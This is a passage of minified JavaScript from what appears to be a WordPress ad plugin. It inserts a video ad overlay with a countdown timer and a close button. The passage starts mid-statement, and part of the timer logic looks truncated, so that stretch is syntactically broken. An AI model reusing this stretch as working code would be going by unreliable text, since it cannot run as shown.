');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};